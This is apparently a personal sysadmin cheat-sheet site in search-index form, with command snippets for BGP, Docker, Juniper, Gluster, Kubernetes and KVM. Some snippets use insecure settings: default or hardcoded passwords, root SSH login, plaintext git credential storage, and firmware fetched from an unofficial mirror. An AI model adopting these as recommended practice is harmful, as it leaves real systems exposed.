    net add interface swp1 ip address 170.39.196.82/32\nnet add bgp autonomous-system 65000\nnet add bgp neighbor 170.39.196.81 remote-as 65000\nnet add bgp neighbor 170.39.196.81 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp neighbor 170.39.196.85 remote-as 65000\nnet add bgp neighbor 170.39.196.85 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\nnet add bgp neighbor 170.39.196.84 remote-as 65000\nnet add bgp neighbor 170.39.196.84 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp neighbor 170.39.196.89 remote-as 65000\nnet add bgp neighbor 170.39.196.89 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.89 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp ipv4 unicast neighbor 170.39.196.84 next-hop-self\nnet add bgp ipv4 unicast neighbor 170.39.196.87 next-hop-self\n\n\nnet add ospf network 170.39.196.80/28 area 0\nnet add ospf default-information originate\nnet add ospf redistribute connected\nnet commit\n
    "},{"location":"docker/","title":"Docker","text":""},{"location":"docker/#stop-all-docker-containers-matching-pattern","title":"Stop all Docker containers matching pattern","text":"
    sudo docker ps | awk '/swift_/ {print $NF}' | xargs -I {} sudo docker stop {}\n
    "},{"location":"docker/#enter-namespace-of-the-container","title":"Enter Namespace of the container","text":"
    sudo docker inspect -f '{{.State.Pid}}' 744d1fc3fdff\n57752\n\n# Enter the Network namespace.\nsudo nsenter -t 57752 --net bash     \n
    "},{"location":"docker/#docker-install-bash-script","title":"Docker install bash script.","text":"
    #Install docker\n#!/bin/bash\n\nsudo apt-get install \\\n     apt-transport-https \\\n     ca-certificates \\\n     curl \\\n     gnupg2 \\\n     software-properties-common\n\ncurl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -\n\nsudo add-apt-repository \\\n   \"deb [arch=amd64] https://download.docker.com/linux/debian \\\n   $(lsb_release -cs) \\\n   stable\"\n\nsudo apt-get update && apt-get install docker-ce\n
    "},{"location":"docker/#idrac-docker-vnc-image","title":"IDRAC Docker VNC image","text":"

    https://github.com/DomiStyle/docker-idrac6

    docker run -d -p 5800:5800 -p 5900:5900 -e IDRAC_HOST=IP_HERE -e IDRAC_USER=root -e IDRAC_PASSWORD=calvin domistyle/idrac6\n
    "},{"location":"docker/#radarr-docker","title":"Radarr Docker","text":"
    docker volume create radarr-config\n\nsudo docker run \\\n  -d \\\n  --name=radarr \\\n  -e PUID=109 \\\n  -e PGID=113 \\\n  -e TZ=America/Toronto \\\n  -p 7878:7878 \\\n  -v radarr-config:/config \\\n  -v /storage/media-gluster/movies/:/movies \\\n  -v /storage/media-gluster/downloads:/downloads \\\n  --restart unless-stopped \\\n  linuxserver/radarr\n
    "},{"location":"docker/#grafana-docker","title":"Grafana Docker","text":"
    sudo docker volume create grafana-storage\ndocker run \\\n  -d \\\n  -p 3000:3000 \\\n  --name=grafana \\\n  -v grafana-storage:/var/lib/grafana \\\n  grafana/grafana\n
    "},{"location":"docker/#couchpotato-docker","title":"Couchpotato Docker.","text":"
    docker volume create couchpotato-config\n\ndocker run \\\n    --name=couchpotato \\\n    -v couchpotato-config:/config \\\n    -v /storage/torrents_download:/downloads \\\n    -v /storage/media/movies:/movies \\\n    -e TZ=America/Toronto \\\n    -e PGID=113 -e PUID=109  \\\n    -p 5050:5050 \\\n    -d \\\n    linuxserver/couchpotato\n
    "},{"location":"docker/#watch-docker-stats","title":"Watch docker stats","text":"
    watch 'docker stats --no-stream --format \"table {{.Container}}\\t{{.Name}}\\t{{.CPUPerc}}\\t{{.MemUsage}}\"'\n
    "},{"location":"elasticsearch/","title":"Elasticsearch","text":""},{"location":"elasticsearch/#clean-indexes-old-than-x-days","title":"Clean indexes old than X days","text":"
    #! /bin/bash\n#Script to cleanup the logstash indices.\nDELETE_INDICES=$(/usr/bin/curl --silent -XGET 'localhost:9200/_cat/indices' | /bin/egrep -o logstash-20[0-9][0-9]\\.[0-9][0-9]\\.[0-9][0-9] | /bin/egrep -v \"$filter\" | /usr/bin/tr '\\n' ',')\nif [ $DELETE_INDICES ]\nthen\n/usr/bin/curl -XDELETE \"localhost:9200/$DELETE_INDICES\"\nfi\n
    "},{"location":"foreman/","title":"Foreman","text":""},{"location":"foreman/#remove-old-kernel-boot-files-sometimes-necessary-when-the-deployment-fails-with-a-kernel-not-foundmismatch-error","title":"Remove old kernel boot files (sometimes necessary when the deployment fails with a Kernel not found/mismatch error)","text":"
    ldumont@foreman:/srv/tftp/boot$ ls -alh\ntotal 189M\ndrwxr-xr-x 2 foreman-proxy root          4.0K Mar  9 12:53 .\ndrwxr-xr-x 8 root          nogroup       4.0K Dec 16  2018 ..\n-rw-r--r-- 1 foreman-proxy foreman-proxy  53M Sep  6  2019 centos-mirror-qVbSBrznIWMc-initrd.img\n-rw-r--r-- 1 foreman-proxy foreman-proxy 6.5M Aug  7  2019 centos-mirror-qVbSBrznIWMc-vmlinuz\n-rw-r--r-- 1 foreman-proxy foreman-proxy  30M Feb  1 09:55 debian-mirror-wXTzvPQ8AfC3-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 5.1M Feb  1 09:55 debian-mirror-wXTzvPQ8AfC3-linux\n-rw-r--r-- 1 foreman-proxy foreman-proxy  36M Apr 20  2016 ubuntu-16.04-16.04.5-x86_64-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 6.7M Apr 20  2016 ubuntu-16.04-16.04.5-x86_64-linux\n-rw-r--r-- 1 foreman-proxy foreman-proxy  45M Apr 25  2018 ubuntu-mirror-WKCIULkETfqj-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 7.9M Apr 25  2018 ubuntu-mirror-WKCIULkETfqj-linux\n\n# Remove the all files related to a single OS.\nsudo rm -f debian-mirror*\n
    "},{"location":"foreman/#update-foreman","title":"Update Foreman","text":"
    #https://theforeman.org/manuals/1.22/index.html#3.6Upgrade\n\nsystemctl apache2 stop\n# Upgrade .list file from /etc/apt/sources.list.d/foreman.list\napt-get update\napt-get --only-upgrade install ruby\\* foreman\\*\nforeman-rake db:migrate\nforeman-rake db:seed\nforeman-rake tmp:cache:clear\nforeman-rake db:sessions:clear\n\n# Test Foreman upgrade\nforeman-installer --noop --dont-save-answers --verbose\n# Start Foreman installer upgrade.\nforeman-installer\nservice apache2 restart\n
    "},{"location":"foreman/#fix-failing-gem-packages","title":"Fix failing GEM packages.","text":"
    # As root\nsu foreman\n# cd to home\ncd\nmv Gemfile.lock Gemfile.lock.backup\n/usr/bin/foreman-ruby /usr/bin/bundle update\n/usr/bin/foreman-ruby /usr/bin/bundle install\n
    "},{"location":"foreman/#remove-plugin","title":"Remove plugin","text":"
    # Remove the gem file for your plugin.\n# rm ~foreman/bundler.d/Gemfile.local.rb\n# ~Gemfile.local.rb\n\n# Reinstall all gems without the old one\n/usr/bin/foreman-ruby /usr/bin/bundle install\n\n# Restart Foreman\ntouch ~foreman/tmp/restart.txt\n
    "},{"location":"frr/","title":"FRR","text":""},{"location":"frr/#enter-frr-shell","title":"Enter FRR shell","text":"
    sudo vtyshell\n
    "},{"location":"frr/#show-bgp-neigbors","title":"Show bgp neigbors","text":"
    show bgp neighbors\nshow bgp summary\n
    "},{"location":"frr/#show-information-from-neighbors","title":"Show information from neighbors","text":"
    show bgp vrf all ipv4 neighbors x.x.x.x advertised-routes\nshow bgp vrf all ipv4 neighbors x.x.x.x received-routes \n
    "},{"location":"frr/#frr-pfsense","title":"FRR pfsense","text":"
    show bgp ipv4 unicast neighbors 170.39.196.221 advertised-routes\nshow bgp summary\n
    "},{"location":"git/","title":"Git","text":""},{"location":"git/#git-stuff","title":"Git Stuff","text":""},{"location":"git/#easy-gitsh","title":"easy-git.sh","text":"
    #!/bin/bash\nDIRECTORY=.git\nif [ -z \"$1\" ]; then\n    echo \"You savage, you need a comment for a commit!\"\n    exit\nfi\n\nif [ -d \"$DIRECTORY\" ]; then\n    git add .\n    git commit -S -m \"$1\"\n    git push origin master\nelse\n    echo \"This is NOT a git repo\"\nfi\n
    "},{"location":"git/#credentials","title":"Credentials","text":"
    git config --global credential.helper store\ngit config --global credential.helper 'cache --timeout=3600' \n
    "},{"location":"gluster/","title":"Gluster","text":""},{"location":"gluster/#troubleshooting","title":"Troubleshooting","text":"
    gluster volume info\n
    sudo gluster peer probe kube2\n
    sudo gluster peer status\n
    gluster volume status all clients\n
    sudo gluster volume create gluster-vol-1 replica 2 transport tcp kube1:/gluster/gluster-vol-1 kube2:/gluster/gluster-vol-1\n
    "},{"location":"gluster/#no-replicate-single-server","title":"No replicate - single server.","text":"
    gluster volume create $VOLUME_NAME $IPADDRESS_OR_DOMAINNAME:/$ROOT_MOUNT_POINT/$SUBFOLDER\ngluster volume start $VOLUME_NAME\n
    "},{"location":"gluster/#mount-a-gluster-share","title":"Mount a gluster share.","text":"
    mount -t glusterfs $GLUSTER_SERVER_IP:$SHARE_NAME $LOCAL_PATH\n
    sudo gluster volume start gluster-vol-1\n
    "},{"location":"gluster/#enable-nfs-on-a-gluster-non-ganesha-volume","title":"Enable nfs on a gluster (non-ganesha) volume","text":"
    gluster volume set media nfs\ngluster volume set media nfs.disable off\ngluster volume set openstack-storage nfs.disable off\n
    "},{"location":"gluster/#disable-ctime-for-rancher-to-be-able-to-mount-gluster-volumes","title":"Disable ctime for Rancher to be able to mount Gluster volumes.","text":"
    root@gluster01:~# history | grep ctime\n  481  gluster volume set kube_vol ctime off\n  498  gluster volume set kube_vol ctime on\n  499  gluster volume set kube_vol ctime off\n  501  history | grep ctime\n
    "},{"location":"iperf/","title":"iPerf","text":"

    UDP TEST (DDOS like test where you send traffic to the other endpoint without any policing. iPerf3 does not allow you to send traffic directly for UDP. It needs to \"connect\" to an iPerf3 endpoint, even for UDP.

    ./iperf -c TARGET_IP --udp --interval 2 --bandwidth 9m\n

    IPERF SERVER TCP

    ./iperf --server\n

    IPERF CLIENT TCP UPLOAD AND THEN DOWNLOAD

    ./iperf --client IPERF_SERVER --tradeoff --window 1M\n

    IPERF CLIENT TCP UPLOAD AND DOWNLOAD AT THE SAME TIME

    ./iperf --client IPERF_SERVER --dualtest --window 1M\n
    "},{"location":"iperf/#iperf-systemd-file","title":"Iperf Systemd file","text":"
    [ec2-user@perf-server ~]$ sudo cat /etc/systemd/system/iperf3.service \n# /etc/systemd/system/iperf.service\n[Unit]\nDescription=iperf server\nAfter=syslog.target network.target auditd.service\n\n[Service]\nExecStart=/usr/bin/iperf3 --log /var/log/iperf/iperf-server.log --server\n\n[Install]\nWantedBy=multi-user.target\n
    "},{"location":"iscsi/","title":"ISCSI","text":""},{"location":"iscsi/#discover-login-targets","title":"Discover login targets","text":"
    iscsiadm --mode discoverydb -t sendtargets --portal $ISCSI_SERVER_IP --discover -d 7\n
    "},{"location":"iscsi/#show-iscsi-stats","title":"Show iscsi stats","text":"
    sudo iscsiadm --mode session --stats\n
    "},{"location":"juniper/","title":"Juniper","text":""},{"location":"juniper/#useful-commands","title":"Useful commands.","text":"
    # Show the current configuration.\nshow configuration\n\n#Show the logs of the device.\nshow log messsage\n\n#Show but compare\nshow | compare\n\n#Show but display as a line configuration and not XML.\nshow | display set\n\n#Show interface list and status\nshow interfaces terse\n\n#Show current hardware\nshow chassis hardware\n\n#Show global routing table\nshow route\n\nshow interface | incl (proto|Desc)\n\n#Show processus using memory and general system performance stats\nshow system processes summary\n\n#Check CPU usage\nshow chassis routing-engine\nshow system process extensive | no-more\n
    "},{"location":"juniper/#delete-interface-config","title":"Delete interface config","text":"
    delete interface ge-0/0/4\ndelete interface ge-0/0/5\ndelete interface ge-0/0/7\ndelete interface ae6\n
    "},{"location":"juniper/#syslog-configuration","title":"Syslog configuration.","text":"
    set system syslog user * any emergency\nset system syslog host 10.0.99.28 any any\nset system syslog host 10.0.99.28 port 1514\nset system syslog file messages any notice\nset system syslog file messages authorization info\nset system syslog file interactive-commands interactive-commands any\n
    "},{"location":"juniper/#radius-configuration","title":"Radius configuration.","text":"
    edit\nset system radius-server $RADIUS_SERVER_IP_HERE source-address $SWITCH_IP_HERE\nset system radius-server $RADIUS_SERVER_IP_HERE secret $PASSWORD_HERE\n\nset system authentication-order [ radius password ]\n\n#Create user profiles based on FreeIPA group.\n\nedit system login\nset user HELPDESK class read-only\nset user OPERATOR class super-user\nset user remote full-name \"default remote access user template\"\nset user remote class read-only\n
    "},{"location":"juniper/#create-a-vlan","title":"Create a vlan","text":"
    set vlans OSTACK-TEST-1 vlan-id 70\n
    "},{"location":"juniper/#create-a-l3-vlan-interface","title":"Create a L3 VLAN interface.","text":"
    set vlans MGMT vlan-id 69\nset interfaces ge-0/0/23 unit 0 family ethernet-switching port-mode trunk 666 vlan members 69\nset interfaces vlan unit 69 family inet address 10.10.69.14/24\nset vlans MGMT l3-interface vlan.69\n
    "},{"location":"juniper/#enable-ssh-with-root-login","title":"Enable SSH with root login.","text":"
    set system services ssh root-login allow\n
    "},{"location":"juniper/#create-a-default-route","title":"Create a default route.","text":"
    set routing-options static route 0.0.0.0/0 next-hop 10.10.69.1\n
    "},{"location":"juniper/#add-a-nameserver-for-dns-resolution","title":"Add a nameserver for DNS resolution.","text":"
    edit system name-server 8.8.8.8 \n
    "},{"location":"juniper/#upgrade-the-junos-image","title":"Upgrade the JunOS image.","text":"
    request system software add http://web.weba.ru/pub/500G_3/Firmware/Juniper/12.3/domestic/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz\n\nfile copy http://web.weba.ru/pub/500G_3/Firmware/Juniper/12.3/domestic/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz  /var/tmp/\n\nrequest system software add /var/tmp/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz reboot\n
    "},{"location":"juniper/#repair-a-junos-partition-that-rebooted-from-the-backup-partition","title":"Repair a JunOS partition that rebooted from the backup partition.","text":"
    ***********************************************************************\n**                                                                   **\n**  WARNING: THIS DEVICE HAS BOOTED FROM THE BACKUP JUNOS IMAGE      **\n**                                                                   **\n**  It is possible that the primary copy of JUNOS failed to boot up  **\n**  properly, and so this device has booted from the backup copy.    **\n**                                                                   **\n**  Please re-install JUNOS to recover the primary copy in case      **\n**  it has been corrupted and if auto-snapshot feature is not        **\n**  enabled.                                                         **\n**                                                                   **\n***********************************************************************\n
    show chassis alarms\nshow system storage partitions\nrequest system snapshot media internal slice alternate\nshow system snapshot media internal\nrequest system reboot slice alternate media internal\n
    "},{"location":"juniper/#create-an-admin-user","title":"Create an admin user.","text":"
    set system login user cmaker authentication plain-text-password\nset system login user cmaker class super-user\n
    "},{"location":"juniper/#add-a-ssh-key-to-a-local-user-for-password-less-auth","title":"Add a SSH key to a local user for password-less auth.","text":"
    set system login user prox-exporter-juniper authentication ssh-rsa \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJZTRPs8WXsD1yNmWd69/zHNDf4ApvTXDjfk0rxEjgiDsOgWvID0Q8ZH0tFzSV9L0W7a/9jG0POuJyiGYF6M4X2QdEPSZ2CgxRm7GL4A1SJ4xbnCYny2k4L8C7UrDrvqThv6/FyyJopHCPp7S3j0iAI6c+Gtv59sbUvdilWC4Y5LX0ho+yocMaGvTOk+l5aQRU9eWmZsD0/3D0V99iBnm70rlEeEIr1Oe+M+y/Q/0vmBVdC75COCxu84PnLvqPH2yOf3j581wgIVncKbApB0b9ApTbCE94jNljtwM4uGM9qICOf0BwbrDfFT1L1n5ZQx7BZnD9410wv2jTYXTPUJV1\"\nset system login user prox-exporter-juniper class super-user\n
    "},{"location":"juniper/#password-recovery","title":"Password recovery.","text":"
    Boot normally.\n\nPrompt : Hit [Enter] to boot immediately, or space bar for command prompt.\n\npress space during the boot process\n\nType :\nloader> boot -s\n\nType : \nEnter full pathname of shell or 'recovery' for root password recovery or RETURN for /bin/sh: recovery\n
    "},{"location":"juniper/#configure-snmp-with-contact-and-location-strings","title":"Configure SNMP with contact and location strings.","text":"
    set snmp name \u201ccmaker-ex2200\u201d description \u201ccmaker-ex2200\u201d\nset snmp location \u201c9880 Clark\u201d\nset snmp contact \"laurentfdumont@gmail.com\"\nset snmp community cmaker authorization read-only\n
    "},{"location":"juniper/#aggregated-interfaces-ae","title":"Aggregated interfaces (AE)","text":"
    #Increase the number of AE interfaces.\nset chassis aggregated-devicesethernetdevice-count4 \n\n\n#Create the AE interface and the switching options.\nset interfaces ae3 description AE-LACP-ULTRABACON-PROXMOX\nset interfaces ae3 aggregated-ether-options lacp active\nset interfaces ae3 unit 0 family ethernet-switching port-mode trunk\nset interfaces ae3 unit 0 family ethernet-switching vlan members 69\nset interfaces ae3 unit 0 family ethernet-switching vlan members 99-100\nset interfaces ae3 unit 0 family ethernet-switching vlan members 210\nset interfaces ae3 unit 0 family ethernet-switching vlan members 2001\nset interfaces ae3 unit 0 family ethernet-switching native-vlan-id 666\n\ncmaker@ex2200-cmaker> show configuration interfaces ge-0/0/17 | display set \nset interfaces ge-0/0/17 description LACP-ULTRABACON-PROXMOX\nset interfaces ge-0/0/17 ether-options 802.3ad ae3\n
    "},{"location":"kolla/","title":"Kolla","text":""},{"location":"kolla/#deploying-kolla","title":"Deploying Kolla","text":"
    kolla-ansible -i ./multinode bootstrap-servers\nkolla-ansible -i ./multinode prechecks\nkolla-ansible -i ./multinode deploy\n
    "},{"location":"kubernetes/","title":"Kubernetes","text":""},{"location":"kubernetes/#pod-configuration","title":"Pod configuration","text":""},{"location":"kubernetes/#get-pods-running-on-specific-node","title":"Get pods running on specific node","text":"
    #Get the node names\nkubectl get nodes                                                                                                                                                                                                                                                                         Tue 14 Apr 2020\nNAME          STATUS   ROLES                      AGE    VERSION\n10.10.99.58   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.59   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.60   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.61   Ready    controlplane,etcd,worker   138d   v1.16.3\n\n#Get all the pods on that node\nkubectl get pods --all-namespaces -o wide --field-selector spec.nodeName=10.10.99.58\n\nkubectl get pods --all-namespaces -o wide --field-selector spec.nodeName=10.10.99.58                                                                                                                                                                                              353ms \ue0b3 Tue 14 Apr 2020\nNAMESPACE              NAME                                                       READY   STATUS      RESTARTS   AGE    IP            NODE          NOMINATED NODE   READINESS GATES\ncattle-prometheus      exporter-node-cluster-monitoring-8zzvj                     1/1     Running     2          36d    10.10.99.58   10.10.99.58   <none>           <none>\ncattle-prometheus      prometheus-operator-monitoring-operator-7985c7f758-9rgf6   1/1     Running     3          36d    10.42.2.112   10.10.99.58   <none>           <none>\ncattle-system          cattle-node-agent-6fprv                                    1/1     Running     5          137d   10.10.99.58   10.10.99.58   <none>           <none>\ncattle-system          rancher-c88c6458c-ggnww                                    1/1     Running     22         138d   10.42.2.103   10.10.99.58   <none>           <none>\ncert-manager           cert-manager-584cbff946-mcds8                              1/1     Running     13         138d   10.42.2.107   10.10.99.58   <none>           <none>\ncert-manager           cert-manager-cainjector-7c556d76f-s48js                    1/1     Running     37         115d   10.42.2.111   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-migrations.1-gwfl9                                  0/1     Completed   0          36d    10.42.2.82    10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-minio-67df89d968-lpg9b                              1/1     Running     2          36d    10.42.2.116   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-nginx-ingress-controller-5655b8bf66-mtvdl           1/1     Running     2          36d    10.42.2.109   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-nginx-ingress-default-backend-677f7b7778-7dj7q      1/1     Running     2          36d    10.42.2.110   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-registry-647ddd89c-qrdhj                            1/1     Running     2          36d    10.42.2.115   10.10.99.58   <none>           <none>\nfoldingathome          fah-workers-3                                              1/1     Running     0          9d     10.42.2.125   10.10.99.58   <none>           <none>\ningress-nginx          default-http-backend-67cf578fc4-6ffns                      1/1     Running     4          138d   10.42.2.104   10.10.99.58   <none>           <none>\ningress-nginx          nginx-ingress-controller-tdfv8                             1/1     Running     4          138d   10.10.99.58   10.10.99.58   <none>           <none>\nistio-system           istio-pilot-56866b7c5f-5pfj4                               2/2     Running     6          73d    10.42.2.106   10.10.99.58   <none>           <none>\nistio-system           istio-sidecar-injector-8565bfc879-85p4n                    1/1     Running     4          73d    10.42.2.102   10.10.99.58   <none>           <none>\nistio-system           istio-tracing-79fbf487df-g6xml                             2/2     Running     7          73d    10.42.2.108   10.10.99.58   <none>           <none>\nkube-system            canal-85lqk                                                2/2     Running     8          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            coredns-5c59fd465f-k6ks7                                   1/1     Running     4          138d   10.42.2.105   10.10.99.58   <none>           <none>\nkube-system            rke-coredns-addon-deploy-job-p97pl                         0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-ingress-controller-deploy-job-r2bcz                    0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-metrics-addon-deploy-job-r2dmg                         0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-network-plugin-deploy-job-ghlhz                        0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nmetallb-system         controller-65895b47d4-stk74                                1/1     Running     2          35d    10.42.2.113   10.10.99.58   <none>           <none>\nmetallb-system         speaker-pnc7d                                              1/1     Running     2          35d    10.10.99.58   10.10.99.58   <none>           <none>\n
    "},{"location":"kubernetes/#config-map","title":"Config-map","text":"
    kubectl create configmap ara-config --namespace cmaker-lab-namespace --from-file=config-maps/settings.yaml   \nkubectl get configmap --namespace cmaker-lab-namespace\n
    "},{"location":"kubernetes/#create-helm-charts","title":"Create helm charts","text":"
    helm install ara-postgres --namespace cmaker-lab-namespace  ./postgresql/ --values postgresql/values.yaml\nhelm install ara-ansible --namespace cmaker-lab-namespace  ./helm-ansible-ara/ --values helm-ansible-ara/values.yaml\n
    "},{"location":"kubernetes/#delete-helm-charts","title":"Delete helm charts","text":"
    helm delete ara-ansible --namespace cmaker-lab-namespace\nhelm delete ara-postgres --namespace cmaker-lab-namespace\n
    "},{"location":"kubernetes/#debugging","title":"Debugging","text":""},{"location":"kubernetes/#delete-pv","title":"Delete PV","text":"
    ldumont@docker01:~$ kubectl delete pv test --grace-period=0 --force^C\nldumont@docker01:~$ kubectl patch pv test -p '{\"metadata\": {\"finalizers\": null}}'\n
    "},{"location":"kubernetes/#storage","title":"Storage","text":""},{"location":"kubernetes/#create-gluster-endpoint","title":"Create Gluster Endpoint.","text":"

    gluster-endpoints.yaml

    ---\nkind: Endpoints\napiVersion: v1\nmetadata:\n name: glusterfs-cluster\nsubsets:\n- addresses:\n - ip: 9.111.249.161\n ports:\n - port: 666\n

    gluster-service.yaml

    apiVersion: v1\nkind: Service\nmetadata:\n  name: glusterfs-cluster\nspec:\n  ports:\n  - port: 666\n
    "},{"location":"kvm/","title":"KVM","text":""},{"location":"kvm/#customize-qcow2-images","title":"Customize qcow2 images","text":"

    Download the .img first

    virt-customize --install ethtool,traceroute,iputils-ping,socat,dnsutils,tcpdump,tshark,iperf,iperf3,mtr,fping,lldpd --root-password password:potato123 -a 22.04-server.img\n

    Sysprep is necessary to remove any static information from a VM (hostname, ssh host keys, interfaces MAC/config). Similar to Windows sysprep.

    In this case, we do not remove the ssh-hostkeys because of possible issues with ssh access if the keys are not re-generated.

    virt-sysprep --operations defaults,-ssh-hostkeys -a 22.04-server.img\n
    "},{"location":"kvm/#using-uvtools-for-ubuntu-minimal-images","title":"Using uvtools for Ubuntu minimal images","text":"

    Download the images

    uvt-kvm  uvt-simplestreams-libvirt sync --source https://cloud-images.ubuntu.com/minimal/daily/ release=bionic arch=amd64\n
    uvt-kvm create --packages iperf,iperf3,dnsutils,tcpdump,--disk 5 --password potato123 --memory 2048 --cpu 2 myminimalvm-jammy release=jammy arch=amd64 \"label=minimal daily\"\n

    Download images are in /var/lib/uvtool/libvirt/images/

    "},{"location":"kvm/#get-list-of-os-variants-valid-for-kvm","title":"Get list of os-variants valid for KVM","text":"
    ldumont@kvm01:~$ osinfo-query os | grep -i centos\ncentos6.0            | CentOS 6.0                                         | 6.0      | http://centos.org/centos/6.0            \ncentos6.1            | CentOS 6.1                                         | 6.1      | http://centos.org/centos/6.1            \ncentos6.10           | CentOS 6.10                                        | 6.10     | http://centos.org/centos/6.10           \ncentos6.2            | CentOS 6.2                                         | 6.2      | http://centos.org/centos/6.2            \ncentos6.3            | CentOS 6.3                                         | 6.3      | http://centos.org/centos/6.3            \ncentos6.4            | CentOS 6.4                                         | 6.4      | http://centos.org/centos/6.4            \ncentos6.5            | CentOS 6.5                                         | 6.5      | http://centos.org/centos/6.5            \ncentos6.6            | CentOS 6.6                                         | 6.6      | http://centos.org/centos/6.6            \ncentos6.7            | CentOS 6.7                                         | 6.7      | http://centos.org/centos/6.7            \ncentos6.8            | CentOS 6.8                                         | 6.8      | http://centos.org/centos/6.8            \ncentos6.9            | CentOS 6.9                                         | 6.9      | http://centos.org/centos/6.9            \ncentos7.0            | CentOS 7.0                                         | 7.0      | http://centos.org/centos/7.0          \n
    "},{"location":"kvm/#create-pxe-only-virsh-domain","title":"Create PXE only virsh domain","text":"
    sudo virt-install --name test-ubuntu \\\n--ram 4096 --vcpus 2 \\\n--disk path=/var/lib/libvirt/images/test-ubuntu,bus=virtio,size=50 \\\n--noautoconsole --graphics vnc \\\n--cdrom=/var/lib/libvirt/boot/mini.iso \\\n--network bridge:br0 \\\n--network bridge:br1 \\\n--os-variant ubuntu18.04\n\nsudo virt-install --name ooo-director \\\n--ram 18432 --vcpus 8 \\\n--disk path=/var/lib/libvirt/images/ooo-director,bus=virtio,size=50 \\\n--noautoconsole --graphics vnc \\\n--cdrom=/var/lib/libvirt/boot/CentOS-7-x86_64-Minimal-1908.iso \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller001 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller001.qcow2,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller002 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller002.qcow2,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller003 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller003.qcow2,bus=virtio,size=50 \\  \n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-compute001 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-compute001,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n
    "},{"location":"kvm/#bridge-physical-interface-for-vm-access","title":"Bridge physical interface for VM access.","text":"
    #Install the bridge-utils package\napt-get install bridge-utils\n\n#Create the two bridges\nbrctl addbr br1\nbrctl addbr br2\n
    # In /etc/network/interfaces\n# Use old eth0 config for br0, plus bridge stuff\n\n#loopback\nauto lo\niface lo inet loopback\n\nauto br0\nauto br1\n\niface br0 inet static\n    address 10.10.99.62\n    gateway 10.10.99.1\n    netmask 255.255.255.0\n    dns-nameservers 10.10.99.1 \n    dns-search cmaker.studio\n    bridge_ports    ens18\n    bridge_stp      off\n    bridge_maxwait  0\n    bridge_fd       0\n\niface br1 inet manual\n    bridge_ports    ens19\n    bridge_stp      off\n    bridge_maxwait  0\n    bridge_fd       0\n
    "},{"location":"kvm/#show-vnc-information-port-is-590vncdisplay_index","title":"Show VNC information - port is 590$(VNCDISPLAY_INDEX)","text":"
    root@kvm01:~# virsh vncdisplay ooo-controller001\n:0\n\nroot@kvm01:~# virsh vncdisplay ooo-controller002\n:1\n\nroot@kvm01:~# virsh vncdisplay ooo-controller003\n:2\n\nroot@kvm01:~# netstat -punta | grep 590\ntcp        0      0 0.0.0.0:5902            0.0.0.0:*               LISTEN      2691/qemu-system-x8 \ntcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      2559/qemu-system-x8 \ntcp        0      0 0.0.0.0:5901            0.0.0.0:*               LISTEN      2649/qemu-system-x8 \n
    "},{"location":"kvm/#vbmc","title":"VBMC","text":""},{"location":"kvm/#installation","title":"Installation","text":"
    yum install gcc python-devel\npip install --upgrade setuptools\npip install virtualbmc\n
    vbmc add ooo-controller001 --port 16001 --username test --password secret\nvbmc add ooo-controller002 --port 16002 --username test --password secret\nvbmc add ooo-controller003 --port 16003 --username test --password secret\nvbmc add ooo-compute001 --port 16004 --username test --password secret\n\nvbmc start ooo-controller001\nvbmc start ooo-controller002\nvbmc start ooo-controller003\nvbmc start ooo-compute001\n
    "},{"location":"kvm/#enable-serial-connection-over-virsh","title":"Enable serial connection over virsh","text":"
    #FROM THE GUEST VM\nsudo systemctl enable serial-getty@ttyS0.service\nsudo systemctl start serial-getty@ttyS0.service\n
    #FROM THE KVM HOST\nsudo virsh console $DOMAIN_NAME\n#OR GET THE DOMAIN ID from `virsh list`\nsudo virsh console $KVM_DOMAIN_ID\n
    "},{"location":"linux/","title":"Generic Linux","text":"
